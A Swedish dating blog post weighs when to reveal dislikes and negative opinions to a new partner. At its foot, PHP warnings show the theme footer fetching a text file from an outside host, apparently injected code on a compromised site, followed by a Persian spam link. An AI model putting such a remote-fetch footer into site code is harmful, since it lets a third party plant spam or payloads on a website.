Menu

När är det dags att avslöja negativa åsikter för en ny kärlek?

 |  Dating

De allra flesta är måna om att göra ett gott intryck när de träffar nya människor. Detta kan gälla såväl i jobbsammanhang som vid exempelvis en dejt. Trots detta allmänt vedertagna sätt att agera är det dock ett faktum att man som människa till slut kommer att behöva avslöja fler saker om sig själv och sina åsikter. Vissa av dem mindre trevliga än andra.

Det är här som åsikterna går isär. En grupp anser att det är bäst att avslöja sina åsikter, och då framförallt vad man ogillar, snabbt medan andra lutar åt att det är bättre att vänta tills dess att man känner varandra innan man ger sig i kast med denna typ av ämne.

Dejtingsverige.se tar denna vecka upp frågan – när är det dags att avslöja sina negativa åsikter för en ny kärlek eller dejt?

Fördelarna med att berätta vad man ogillar snabbt är utan tvekan att man inte döljer den man är. Dessutom är ett annat populärt argument att man inte slösar tid på ett förhållande där åsikterna är för olika för att fungera ihop utan istället kan gå vidare innan man fått för starka känslor.

Nackdelarna är att man riskerar att stöta bort sitt livs kärlek innan man lärt känna varandra på riktigt om man häver ur sig allt man ogillar på en gång. Det är ju trots allt så att man oftast har större förståelse och vilja att prata med varandra om ämnet på riktigt om man redan känner varandra och har starka känslor.

Vilka är era erfarenheter av detta ämne – dela gärna med er här nedan..

 

 


Leave a Reply


Warning: file_get_contents(): php_network_getaddresses: getaddrinfo failed: No address associated with hostname in /home/dejtings/public_html/wp-content/themes/bigfeature/footer.php on line 13

Warning: file_get_contents(http://3eo.biz/1.txt): failed to open stream: php_network_getaddresses: getaddrinfo failed: No address associated with hostname in /home/dejtings/public_html/wp-content/themes/bigfeature/footer.php on line 13

دانلود فیلم با لینک مستقیم